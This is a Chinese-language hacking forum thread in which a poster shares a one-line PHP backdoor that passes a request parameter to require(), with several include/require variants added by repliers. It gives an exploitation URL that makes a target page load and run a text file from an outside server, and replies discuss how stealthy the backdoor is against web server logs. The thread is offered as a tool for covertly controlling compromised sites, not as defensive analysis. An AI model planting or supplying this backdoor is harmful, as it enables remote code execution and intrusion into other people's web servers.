[原创]来一个另类的PHP一句话后门
文章作者:风蓝信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[code]<?require($_REQUEST['a']);?>[/code]
或是
<?require($a);?>
利用方法
[url]http://www.target.com/file.php?a=http://www.tantao.cn:8080/b.txt[/url]
[s:64] [s:64] [s:64]
这样不使用eval了后门又隐蔽了些.
不知道能不能当原创~不能的话就帮我转到技术讨论吧。 唉,PHP就是比ASP好,远程包含文件。。。。 来自php手册,有一定的局限性!
[quote]警告
Windows 版本的 PHP 在 4.3.0 版之前不支持本函数的远程文件访问,即使 allow_url_fopen 选项已被激活。[/quote] [url]http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=34792[/url] 不觉得隐蔽,一查www日志就发现了 [s:43] 楼上的Post一下吧
HOHO 这一句话,好象在国外的黑客教程动画里见过。,。。。 用了很久了,哇哈哈哈 如果察看日志的话,POST的,还是可以看到。不过隐蔽性确实好了点。 <?require($a);?>
<?require $a;?>
<?require_once $a;?>
<?include $a;?> 貌似 不怎么管用啊 [s:289] 这样就能关了后门吗 可以用JAVASCRIPT 形式写PHP 后门。
页:
[1]